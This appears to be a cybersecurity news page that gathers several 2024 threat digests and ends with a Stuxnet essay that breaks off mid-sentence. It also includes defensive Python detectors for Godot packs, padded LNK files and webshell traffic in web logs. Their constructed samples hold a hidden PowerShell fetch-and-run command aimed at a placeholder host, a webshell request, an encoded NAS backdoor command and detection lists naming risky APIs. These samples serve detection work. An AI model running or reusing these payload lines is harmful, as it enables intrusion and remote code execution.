russia ukraine news

VIEH Daily Threat Analysis | November 29, 2024

Hackers are rewriting the rules of game development with malicious intent. By embedding the GodLoader malware in asset files for the popular Godot game engine, attackers have compromised over 17,000 systems globally. Hosted in seemingly legitimate GitHub repositories, the malware steals credentials, installs crypto miners, and targets developers and gamers alike.

WhatsApp's trust is being turned against its users. The PixPirate malware, which began in Brazil, now spans countries including India, Italy, and Mexico. Spreading through social engineering on YouTube and malicious WhatsApp messages, it manipulates contacts, creates spam groups, and exploits its victims' trust in the messaging platform.

Unpatched software remains an open door for cybercriminals. A critical authentication bypass flaw in ProjectSend is enabling attackers to upload webshells and gain remote access to servers. Although a patch has been available since May 2023, most instances remain vulnerable, highlighting the importance of timely updates.

Top Malware Reported in the Last 24 Hours

Hackers abuse Godot to deploy GodLoader
Attackers used the GodLoader malware, abusing the popular Godot game engine, to infect over 17,000 systems across multiple platforms. Exploiting the engine's flexibility and its GDScript scripting language, they embedded malicious scripts in game asset (.pck) files, which the engine executes as part of loading the game. The malware steals credentials and downloads additional payloads, including a crypto miner. The attackers used the Stargazers Ghost Network to distribute the malware through seemingly legitimate GitHub repositories, targeting developers and gamers.

APT-C-60 targets Japan with SpyGlace
The South Korea-aligned cyber-espionage group APT-C-60 attacked an organization in Japan, using a job-application theme to deliver the SpyGlace backdoor. The attack leveraged legitimate services such as Google Drive, Bitbucket, and StatCounter. A phishing email disguised as a job application was sent to the organization's recruiting contact and led to a malware infection. The chain exploited a remote code execution vulnerability in WPS Office, triggered through a file hosted on Google Drive. SpyGlace let the attackers steal files and execute commands by connecting to a command-and-control (C2) server.

PixPirate resurfaces, spreads via WhatsApp
The PixPirate malware, originally targeting financial services in Brazil, has evolved to spread through WhatsApp and now affects countries including India, Italy, and Mexico. It uses social engineering on YouTube to trick users into installing it and then propagates through malicious WhatsApp messages. The malware hides itself on the device and abuses WhatsApp's trust-based contact model to send and delete messages, manipulate contacts, and create spam groups.

Top Vulnerabilities Reported in the Last 24 Hours

Microsoft re-releases Exchange updates
Microsoft re-released the November 2024 security updates for Exchange Server after initially pulling them because of email delivery problems caused by custom mail flow rules. The re-released update, Nov 2024 SUv2, resolves the mail delivery problems and gives more granular control over email headers. Admins are advised to install the re-released update and run the Exchange Health Checker script afterwards. The update also adds detection of, and warnings about, attempts to exploit a high-severity Exchange Server spoofing vulnerability (CVE-2024-49040).

ProjectSend flaw under exploit
Threat actors are actively exploiting a critical authentication bypass flaw (CVE-2024-11680) in ProjectSend to upload webshells and gain remote access to servers. Although a patch has been available since May 16, 2023, the vast majority of ProjectSend instances (99%) remain vulnerable. Public exploits released in September 2024 have driven a rise in exploitation, with attackers altering system settings, enabling user registration, and deploying webshells. Users should upgrade to ProjectSend version r1750 to mitigate the widespread attacks.

Top Scams Reported in the Last 24 Hours

"You're Fired!" Beware of this new scam
A new phishing campaign deceives people into thinking they have lost their jobs. It starts with an email that looks like a legal notice of termination. Cloudflare observed the attack against 14 of its customers, suggesting a single actor behind it. One email subject, "Action Required: Tribunal Proceedings Against You," threatens legal action and prompts the recipient to click a link that downloads malware. The campaign mainly targets Windows users, delivering a banking trojan named Ponteiro that steals credentials.

Content credit: Check Point, The Hacker News, Security Intelligence, BleepingComputer, The Register, Cyware
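The GodLoader item above rests on one mechanism: Godot executes whatever GDScript sits in the .pck asset pack it loads, so the first question a defender asks about a suspicious game download is which scripts the pack contains and which of them reach outside the engine. The triage script below is an added example and is not code from the original page or from Check Point's report. It assumes the pack layout I read from Godot's file_access_pack.cpp (format version 1 for Godot 3, version 2 for Godot 4), does not decode encrypted packs or compiled .gdc/.gdb bytecode, and treats the SUSPICIOUS_CALLS list as a starting heuristic rather than a GodLoader signature. The sample pack is constructed inline; the loader-like script in it is invented for the demonstration.

```python
"""Triage a Godot .pck for GDScript that reaches outside the engine sandbox."""
import hashlib
import io
import re
import struct

PCK_MAGIC = b"GDPC"
ENCRYPTED = 1          # pack/file flag bit 0 in format version 2 (assumed)

# GDScript APIs that let a script spawn processes, touch arbitrary files or
# talk to the network. Assumed starting heuristic, not a GodLoader signature.
SUSPICIOUS_CALLS = ("OS.execute", "OS.create_process", "OS.shell_open",
                    "FileAccess.open", "DirAccess.open", "HTTPRequest", "HTTPClient")


def _pad4(n):
    return (4 - n % 4) % 4


def build_pck(files, version=2):
    """Write a minimal unencrypted pack so the reader can be exercised offline.
    Layout assumed from Godot's file_access_pack.cpp (v1 = Godot 3, v2 = Godot 4)."""
    b = io.BytesIO()
    b.write(PCK_MAGIC)
    b.write(struct.pack("<IIII", version, 4 if version == 2 else 3, 0, 0))  # format, engine ver
    base_pos = None
    if version == 2:
        b.write(struct.pack("<I", 0))                 # pack flags: not encrypted
        base_pos = b.tell()
        b.write(struct.pack("<Q", 0))                 # file base, patched below
    b.write(b"\x00" * 64)                             # 16 reserved uint32
    b.write(struct.pack("<I", len(files)))
    entries = [(p.encode(), d) for p, d in files.items()]
    dir_size = sum(4 + len(p) + _pad4(len(p)) + 32 + (4 if version == 2 else 0)
                   for p, _ in entries)
    file_base = b.tell() + dir_size
    ofs = 0
    for p, d in entries:
        plen = len(p) + _pad4(len(p))
        b.write(struct.pack("<I", plen) + p + b"\x00" * (plen - len(p)))
        # v1 stores absolute offsets; v2 stores offsets relative to file_base
        b.write(struct.pack("<QQ", ofs if version == 2 else file_base + ofs, len(d)))
        b.write(hashlib.md5(d).digest())
        if version == 2:
            b.write(struct.pack("<I", 0))             # per-file flags
        ofs += len(d)
    assert b.tell() == file_base
    if version == 2:
        b.seek(base_pos)
        b.write(struct.pack("<Q", file_base))
        b.seek(file_base)
    for _, d in entries:
        b.write(d)
    return b.getvalue()


def read_pck(blob):
    """Parse the directory; return [(path, data, flags)] with every md5 verified."""
    f = io.BytesIO(blob)
    if f.read(4) != PCK_MAGIC:
        raise ValueError("not a Godot PCK")
    version, = struct.unpack("<I", f.read(4))
    f.read(12)                                        # engine major/minor/patch
    pack_flags, file_base = 0, 0
    if version == 2:
        pack_flags, file_base = struct.unpack("<IQ", f.read(12))
    elif version != 1:
        raise ValueError("unsupported pack format %d" % version)
    if pack_flags & ENCRYPTED:
        raise ValueError("encrypted directory: cannot scan without the key")
    f.read(64)                                        # reserved
    count, = struct.unpack("<I", f.read(4))
    out = []
    for _ in range(count):
        plen, = struct.unpack("<I", f.read(4))
        path = f.read(plen).rstrip(b"\x00").decode()
        ofs, size = struct.unpack("<QQ", f.read(16))
        md5 = f.read(16)
        flags = struct.unpack("<I", f.read(4))[0] if version == 2 else 0
        data = blob[file_base + ofs:file_base + ofs + size]
        if hashlib.md5(data).digest() != md5:
            raise ValueError("md5 mismatch for %s: truncated or tampered pack" % path)
        out.append((path, data, flags))
    return out


def scan_pck(blob):
    """Return {script_path: [suspicious calls]} for plaintext .gd scripts in the pack."""
    findings = {}
    for path, data, flags in read_pck(blob):
        if not path.endswith(".gd") or flags & ENCRYPTED:
            continue                                  # .gdc/.gdb bytecode is not decoded here
        lines = data.decode("utf-8", "replace").splitlines()
        code = "\n".join(ln for ln in lines if not ln.lstrip().startswith("#"))
        hits = [c for c in SUSPICIOUS_CALLS if re.search(r"\b%s\b" % re.escape(c), code)]
        if hits:
            findings[path] = hits
    return findings


# Constructed sample: a benign script and one that behaves like a loader. Not real GodLoader code.
SAMPLE_PACK = build_pck({
    "res://player.gd": b"extends CharacterBody2D\nfunc _physics_process(delta):\n\tmove_and_slide()\n",
    "res://addons/boot.gd": (b"extends Node\n# OS.execute in a comment must not count\n"
                             b"func _ready():\n\tvar r = HTTPRequest.new()\n\tadd_child(r)\n"
                             b"\tOS.execute(\"cmd.exe\", [\"/c\", \"whoami\"])\n"),
    "res://icon.png": b"\x89PNG\r\n\x1a\n",
})

if __name__ == "__main__":
    for script, calls in scan_pck(SAMPLE_PACK).items():
        print(script, "->", ", ".join(calls))
```

Run it against a downloaded pack with scan_pck(open(path, "rb").read()). Confirm the header layout against your engine version before trusting the offsets; because every entry's md5 is checked, a wrong layout usually fails loudly instead of returning plausible-looking garbage.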


VIEH Daily Threat Analysis | June 20, 2024

In the shadows of cyberspace, a devious malware loader is slinking through phishing campaigns to target Chinese organizations. Named SquidLoader, this threat can thwart both static and dynamic analysis, delivering second-stage shellcode payloads with precision. Simultaneously, the China-linked cyber-espionage group UNC3886 has been exploiting zero-day vulnerabilities in Fortinet, Ivanti, and VMware devices, infiltrating targets across North America, Southeast Asia, and Oceania. Its sophisticated persistence mechanisms, including rootkits and backdoors, ensure prolonged access and surveillance.

Adding to the digital intrigue, ANSSI has sounded the alarm on Midnight Blizzard, a Russian state-sponsored hacking group, targeting the French Ministry of Foreign Affairs. Using compromised email accounts of governmental bodies, it attempted network infiltration via phishing campaigns.

Top Malware Reported in the Last 24 Hours

New SquidLoader malware emerges
AT&T LevelBlue Labs discovered a new evasive malware loader named SquidLoader that spreads via phishing campaigns targeting Chinese organizations. It uses a range of techniques to avoid detection and analysis while fetching second-stage shellcode payloads: encrypted code segments, pointless unused code, control-flow-graph obfuscation, debugger detection, and direct syscalls in place of the Windows NT API functions. Together these features are designed to defeat both static and dynamic analysis.

Multiple attack chains deploy Fickle Stealer
Fortinet spotted a new Rust-based malware called Fickle Stealer that targets Microsoft Windows users. The attack chain consists of three stages: delivery, preparatory work, and the packer and stealer payload. Delivery is done through a VBA dropper, a VBA downloader, a link downloader, or an executable downloader. The preparatory work involves scripts that bypass User Account Control, create new scheduled tasks, and send messages to a Telegram bot. The packer disguises Fickle Stealer as a legitimate executable to avoid static analysis. The stealer payload uses anti-analysis techniques and communicates with the server to send stolen information.

Top Vulnerabilities Reported in the Last 24 Hours

Chrome 126 update released
Google released a Chrome 126 update to address six vulnerabilities, including a high-severity type confusion issue in the V8 script engine (CVE-2024-6100) that was reported by a researcher at the TyphoonPWN 2024 hacking competition. Google also addressed other high-severity flaws: an inappropriate implementation issue in WebAssembly (CVE-2024-6101), an out-of-bounds memory access in Dawn (CVE-2024-6102), and a use-after-free in Dawn (CVE-2024-6103). The tech giant has not shared technical details on the vulnerabilities, but confirmed it is not aware of any attacks exploiting them in the wild.

Can anyone spoof Microsoft employee emails?
A security researcher has discovered a bug that allows anyone to impersonate Microsoft corporate email accounts. The bug has not been patched yet, and Microsoft dismissed the initial report, saying it could not reproduce the issue. The bug only works when sending emails to Outlook accounts, a pool of at least 400 million users worldwide. The extent of any malicious exploitation is unknown.

UNC3886 abuses 0-days in long-term espionage
The China-linked cyber-espionage group UNC3886 has been using zero-day exploits against Fortinet, Ivanti, and VMware devices, focusing on entities in North America, Southeast Asia, and Oceania. The group has developed sophisticated persistence and evasion tactics, including rootkits and backdoors, to maintain access and spy on victims for extended periods. The attackers have also leveraged trusted services such as GitHub and Google Drive for C2 communications.

CISA publishes ICS advisory
CISA issued an advisory about a high-severity vulnerability in an outdated industrial switch made by RAD Data Communications. The vulnerability, tracked as CVE-2019-6268, is a path traversal issue that allows unauthorized access to sensitive files, posing a risk to ICS and other OT systems. The RAD SecFlow-2 has reached end-of-life, and the vendor recommends that customers upgrade to a newer product. Because the impacted product is used worldwide in the communications sector, the agency provided general recommendations to reduce the risk of exploitation.

Top Scams Reported in the Last 24 Hours

New Midnight Blizzard phishing campaign
ANSSI warned that the Russian state-sponsored hacking group Midnight Blizzard (aka Cozy Bear and APT29) targeted the French Ministry of Foreign Affairs using compromised email accounts of government staffers from the Ministry of Culture and the National Agency for Territorial Cohesion. The group attempted to infiltrate the networks through phishing campaigns, but ANSSI concluded that the hackers were unable to move laterally into government systems. The attacks align with Russian intelligence-gathering operations; related phishing campaigns also targeted French embassies in Ukraine and Romania.

Content credit: AT&T, Fortinet, Security Affairs, TechCrunch, Google, SecurityWeek, BankInfoSecurity, Cyware


Hacking Update 09/04/2024

The End-of-Life (EOL) crisis hits again! D-Link advised retiring tens of thousands of internet-facing NAS devices, as they will no longer receive security updates or vendor support. A security bug in these devices allows attackers to execute arbitrary commands and trigger a denial of service. In another bug-related headline, Cisco fixed a high-severity vulnerability in its Catalyst 6000 Series Switches, triggered by improper handling of process-switched traffic, that can lead to denial of service. AI-themed fraud campaigns continue to proliferate as digital adversaries ride ongoing technology trends. Most recently, victims were manipulated into joining fraudulent Facebook communities to download and run malicious executables posing as upcoming AI features and services.

Top Malware Reported in the Last 24 Hours

Malicious Facebook ads spread malware
A cybercrime group was spotted promoting fake AI services such as Midjourney, OpenAI's Sora, and "ChatGPT-5", tricking users into downloading password-stealing malware. It does this through Facebook ads and hijacked profiles impersonating popular AI services that promise previews of new features. Information-stealing malware including Rilide, Vidar, IceRAT, and Nova targeted victims' browsers to steal credentials, cryptocurrency wallets, and other sensitive data.

APT group launches malware campaign
The Vedalia APT group deployed a new malware campaign leveraging oversized LNK files to bypass traditional security measures and compromise targeted systems. Broadcom recently highlighted this evolution in the group's tactics, revealing how large LNK files with double extensions and excessive whitespace obscure the malicious command line, making detection challenging. The embedded script in these files executes PowerShell commands to evade detection and deliver payloads such as CL.Downloader!gen20 and trojans.
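A triage heuristic for the oversized-LNK technique in the Vedalia item above, as an added example (not Broadcom's or Symantec's detection logic). It checks the fixed ShellLinkHeader, then scores the traits the item describes: a double extension in the file name, a file far larger than a normal shortcut, a PowerShell invocation among the embedded UTF-16LE strings, a long run of whitespace in front of the real arguments, and hidden-window or encoded-command switches. The size and whitespace thresholds are assumptions to tune; the sample shortcut is constructed inline and the URL in it is a documentation address.

```python
"""Score .lnk files for the padded-PowerShell pattern described above."""
import re

# ShellLinkHeader: HeaderSize 0x4C followed by the ShellLink CLSID
# 00021401-0000-0000-C000-000000000046, both stored little-endian.
LNK_HEADER = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")
SIZE_LIMIT = 64 * 1024      # assumed: ordinary shortcuts are a few KB
PAD_RUN = 200               # assumed: whitespace run long enough to push the command off-screen

UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")          # printable UTF-16LE strings
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png|hwp)\.lnk$", re.I)
ENCODED_OR_HIDDEN = re.compile(r"-(e|ec|enc|encodedcommand|w|windowstyle)\s", re.I)


def is_lnk(blob):
    return blob.startswith(LNK_HEADER)


def utf16_strings(blob):
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]


def score_lnk(name, blob):
    """Return (score, reasons); each distinct heuristic that fires adds one point."""
    if not is_lnk(blob):
        return 0, ["not a shell link"]
    reasons = []
    if DOUBLE_EXT.search(name):
        reasons.append("double extension in name: %s" % name)
    if len(blob) > SIZE_LIMIT:
        reasons.append("oversized shortcut: %d bytes" % len(blob))
    for s in utf16_strings(blob):
        low = s.lower()
        if "powershell" in low or "pwsh" in low:
            reasons.append("powershell in embedded strings")
        if re.search(r"\s{%d,}" % PAD_RUN, s):
            reasons.append("whitespace padding hides the command line")
        if ENCODED_OR_HIDDEN.search(s):
            reasons.append("hidden window or encoded command switch")
    reasons = list(dict.fromkeys(reasons))       # de-duplicate across strings, keep order
    return len(reasons), reasons


def build_sample(padding):
    """Constructed shortcut: real header, zeroed link info, one UTF-16LE argument
    string with `padding` spaces before the payload, then junk to inflate the size."""
    args = "powershell.exe -w hidden -c" + " " * padding + " iex (iwr http://203.0.113.10/p.txt)"
    return LNK_HEADER + b"\x00" * 56 + args.encode("utf-16-le") + b"\x00" * (70 * 1024)


# Constructed benign shortcut for comparison.
BENIGN_LNK = LNK_HEADER + b"\x00" * 56 + "C:\\Windows\\notepad.exe".encode("utf-16-le")

if __name__ == "__main__":
    for name, blob in (("invoice.pdf.lnk", build_sample(300)), ("Notepad.lnk", BENIGN_LNK)):
        score, why = score_lnk(name, blob)
        print(name, score, why)
```

In a mail gateway or EDR pipeline, feed score_lnk the attachment name and bytes and quarantine anything scoring 3 or more; a real shortcut parser (which walks LinkFlags and the StringData sections) would replace utf16_strings, but the padding trick is visible even with this crude string extraction.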
Top Vulnerabilities Reported in the Last 24 Hours

EOL D-Link NAS models pose threats
A researcher known as Netsecfish disclosed a serious flaw, CVE-2024-3273, affecting multiple EOL D-Link NAS models, including the DNS-340L, DNS-320L, DNS-327L, and DNS-325. The flaw combines a hardcoded backdoor account with arbitrary command injection, both reachable through the nas_sharing.cgi URI. Exploitation could lead to unauthorized access, system configuration changes, or denial of service. Over 92,000 internet-facing devices were found at risk.

Cisco fixes high-severity issue in switches
Cisco resolved a high-severity vulnerability, tracked as CVE-2024-20276, in Cisco IOS Software for Catalyst 6000 Series Switches. The flaw, triggered by improper handling of process-switched traffic, could allow an unauthenticated, local attacker to force a device to reload, causing a DoS condition. Affected products include Catalyst 6500 and 6800 Series Switches with specific supervisor engines.

Top Scams Reported in the Last 24 Hours

Social media platforms exploited for phishing
Threat actors were found abusing work-associated social media accounts in a new attack that combines compromised accounts with a two-step phishing scheme. Attackers used deceptive messages from compromised accounts to lure victims into clicking malicious links disguised as legitimate OneDrive documents, leading to account takeovers and credential theft. Threat groups such as 3rr0r Hun73r used this tactic to steal both personal and corporate data.

Healthcare IT helpdesks targeted by social engineering
The HHS alerted the Healthcare and Public Health (HPH) sector about adversaries enrolling their own devices in MFA with the help of IT helpdesks, where they impersonate finance department employees. Using stolen identity verification details and claiming smartphone problems, they get a new device registered and gain access to corporate resources. According to experts, this modus operandi resembles that of the Scattered Spider threat group, known for ransomware attacks on prominent organizations.

Content credit: BleepingComputer, GBHackers, Security Affairs, Cyware
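Both the ProjectSend item in the 29 November digest above and the D-Link NAS item here describe attacks that leave a recognisable trail in web-server access logs. The detector below is an added example, not code from the original page, VulnCheck, Netsecfish or either vendor, and its matching rules are assumptions drawn from those items rather than published indicators: for ProjectSend it flags a POST to options.php from a client that has not completed a login (the bypass lets an unauthenticated client change settings) and any later fetch by that client of a .php file under the upload directory; for the D-Link backdoor it flags requests to nas_sharing.cgi that carry a base64-encoded command in the system parameter and decodes it for the analyst. The login endpoint, upload path and parameter name are assumed; the log lines are constructed.

```python
"""Scan web-server access logs for the ProjectSend and D-Link NAS exploitation patterns."""
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx common or combined log format; assumed as the input format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict with ip, method, path, query and status, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    parts = urlsplit(d["url"])
    d["path"], d["query"] = parts.path, parse_qs(parts.query)
    return d


def decode_dlink_cmd(query):
    """Assumed: nas_sharing.cgi takes the shell command base64-encoded in `system`.
    Returns the decoded command, a marker for undecodable input, or None if absent."""
    for raw in query.get("system", []):
        try:
            return base64.b64decode(unquote(raw), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return "<undecodable: %s>" % raw
    return None


def detect(lines):
    """Return [(ip, rule, detail)] alerts in log order."""
    alerts = []
    logged_in = set()          # clients that completed a ProjectSend login
    tampered = set()           # clients that changed settings without logging in
    for line in lines:
        e = parse_line(line)
        if not e:
            continue
        ip, path = e["ip"], e["path"]
        # Assumed: the login form posts to index.php and answers with a redirect.
        if path.endswith("/index.php") and e["method"] == "POST" and e["status"] in (302, 303):
            logged_in.add(ip)
        if path.endswith("/options.php") and e["method"] == "POST" and ip not in logged_in:
            tampered.add(ip)
            alerts.append((ip, "projectsend-unauth-options", path))
        # Assumed upload location; a .php fetched from there by a tampering client is a webshell.
        if ip in tampered and "/upload/" in path and path.endswith(".php"):
            alerts.append((ip, "projectsend-webshell-fetch", path))
        if path.endswith("/nas_sharing.cgi"):
            cmd = decode_dlink_cmd(e["query"])
            if cmd is not None:
                alerts.append((ip, "dlink-nas-backdoor-cmd", cmd))
    return alerts


# Constructed log lines: an admin who logged in, an attacker who did not, and a NAS probe.
SAMPLE_LOG = """\
198.51.100.7 - - [27/Nov/2024:10:02:11 +0000] "POST /index.php HTTP/1.1" 302 0
198.51.100.7 - - [27/Nov/2024:10:02:40 +0000] "POST /options.php HTTP/1.1" 200 412
203.0.113.9 - - [27/Nov/2024:11:15:02 +0000] "POST /options.php HTTP/1.1" 200 412
203.0.113.9 - - [27/Nov/2024:11:16:30 +0000] "GET /upload/files/shell.php?c=id HTTP/1.1" 200 76
192.0.2.44 - - [27/Nov/2024:12:00:01 +0000] "GET /cgi-bin/nas_sharing.cgi?cmd=15&system=aWQ= HTTP/1.1" 200 120
192.0.2.44 - - [27/Nov/2024:12:00:05 +0000] "GET /cgi-bin/nas_sharing.cgi?cmd=15 HTTP/1.1" 200 120
""".splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

The login tracking is deliberately coarse: it only suppresses alerts for clients that visibly authenticated earlier in the same log, so a settings change early in a rotated log still surfaces for review, which is the right failure direction when 99% of instances are reported unpatched.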


The real story behind Russia-Ukraine cyber wars

"The Russian president is likely to use cyber attacks as a form of retaliation against our country for its action to counter Russia's incursion in Ukraine." – President of the USA, Joe Biden, at the Business Roundtable quarterly meeting, March 2022

"In March 2022, hackers associated with Russian IP addresses have been scanning the networks of 5 US energy companies and 18 US companies in other sectors like defence and financial services, hunting for zero-day (still undiscovered) vulnerabilities to execute disruptive and destructive cyber activity." – FBI

"We will unleash the full wrath of the world's hackers; key components of your (Russian) Government would be hijacked. Websites of the Duma, the Ministry of Defence, the state-controlled TV R.com and the Russian stock exchange have already been taken down." – The hacker collective Anonymous, sympathetic to Ukraine, March 2022

Welcome to the scary world of new-age hybrid warfare, where cyber attacks are a sine qua non of any military exercise. Ever wondered what the following hacker groups have in common?

– Fancy Bear, Sandworm, Conti and Turla: all Russian, and allegedly responsible for hacking presidential elections in Ukraine and for the 'NotPetya' attacks that caused mayhem across Ukraine's critical infrastructure.

– Bureau 121 and the Lazarus Group, owing allegiance to North Korea and allegedly responsible for the 2016 Bangladesh Bank cyber heist of USD 81 million, the worldwide WannaCry ransomware attacks (for more on WannaCry, see the author's column dated February 24, 2022), and the November 2014 hack on Sony Pictures, allegedly in retaliation for mocking the supreme leader of North Korea, for which Lazarus operator Park Jin Hyok was charged and placed on the FBI's wanted list, though North Korea denies he exists.

– Hacker groups owing allegiance to Iran's IRGC (Islamic Revolutionary Guard Corps), infamous for the cyber attack on Saudi Aramco that rendered more than 30,000 computers useless.

– MI5, MI6 and GCHQ (Government Communications Headquarters) of the UK, capable of tapping the data flowing through undersea cables, i.e. approximately 25% of global data.

– Unit 8200 of Israel, which allegedly launched the world's most sophisticated cyber attack, Stuxnet, to stymie Iran's nuclear ambitions.

– PLA Unit 61486, APT 31, APT 41, Stone Panda and RedEcho, groups affiliated with China and, according to a report in The New York Times, allegedly responsible for the sensational power outage in Mumbai, a city of 20 million people, in which trains were halted and the stock market closed while hospitals switched to emergency power to keep ventilators running amid the Covid outbreak. This happened while Chinese and Indian troops clashed in the remote Galwan Valley, bludgeoning each other to death with clubs and rocks.

The common thread running through all of these groups is that they are allegedly 'elite nation-state actors': hacker collectives churning out bespoke malware to attack the critical infrastructure of adversary states. With the backing of nation states, they launch cyber attacks of incredible sophistication to cripple critical infrastructure such as power plants, banking systems, nuclear plants and transportation systems of hostile regimes, in order to 'soften' them before an all-out military campaign on the ground. They have earned the moniker 'Advanced Persistent Threat' (APT) actors.

Operation Olympic Games

By the late 2000s the furrows on the brows of Israeli officials and their NSA counterparts had deepened. Iran was behaving like a rogue state, rapidly developing the capability to build nuclear weapons while presenting its facilities as a civil nuclear energy programme. It had stopped cooperating with the International Atomic Energy Agency (IAEA) and closed its fuel enrichment plants to inspection. Israel knew that a nuclear-armed Iran would tilt the balance of power in the region and jeopardise the very existence of the small Jewish state.

Full-scale preparations had begun to modify missiles and bomb Iran's nuclear facilities. That could have spawned a major war with heavy loss of life. In spite of such risks, Israel believed Iran had to be stopped for the sake of its own survival. Then, allegedly on the advice of the Israeli prime minister's technology advisor in consultation with the NSA, the two countries instead launched Operation Olympic Games: an operation to design and deploy the world's most sophisticated cyber weapon, Stuxnet (the name is derived from keywords found in its code), without firing a bullet.

Stuxnet, discovered by researcher Sergey Ulasen and first analysed by the Belarusian security firm VirusBlokAda, was the most sophisticated piece of malware seen up to that point, and its effects were both ingenious and terrifying. It opened the Pandora's box of state-executed cyber warfare. Stuxnet sabotaged the uranium enrichment facility at Natanz, Iran, which was heavily fortified and air-gapped, i.e. not connected to the internet. Pakistani nuclear scientist Dr A.Q. Khan had supplied centrifuge designs and components to Iran, and their operation was studied meticulously by researchers at Mossad and the NSA; Stuxnet was tailored accordingly. It is believed that contractors with physical access bridged the air gap by carrying Stuxnet in on USB flash drives. From the infected Windows engineering workstations it reprogrammed the plant's Siemens programmable logic controllers (PLCs), the small computers that control industrial automation in practically every sector, including aviation, power plants, water treatment and nuclear plants. Sabotage of PLCs can bring a whole nation to its knees. This was the beginning of hybrid warfare and the debut of a state-of-the-art digital weapon with immense precision and agility, and no ground troops.

Over a period of months, the infected controllers repeatedly drove the centrifuges outside their safe speed range while replaying normal readings to the operators, until the rotors tore themselves apart. Stuxnet's baptism by fire marked the first time a cyber weapon had caused irreversible physical damage, and it is credited with destroying roughly a thousand centrifuges and setting back Iran's enrichment programme, even though it did not end it.

The story behind the Russia-Ukraine cyber wars

In 2014, Russia annexed Crimea, which was part of Ukraine. This was followed by a Russia-backed insurgency in eastern Ukraine, which has resulted in more than 20,000 deaths to date. The year marked
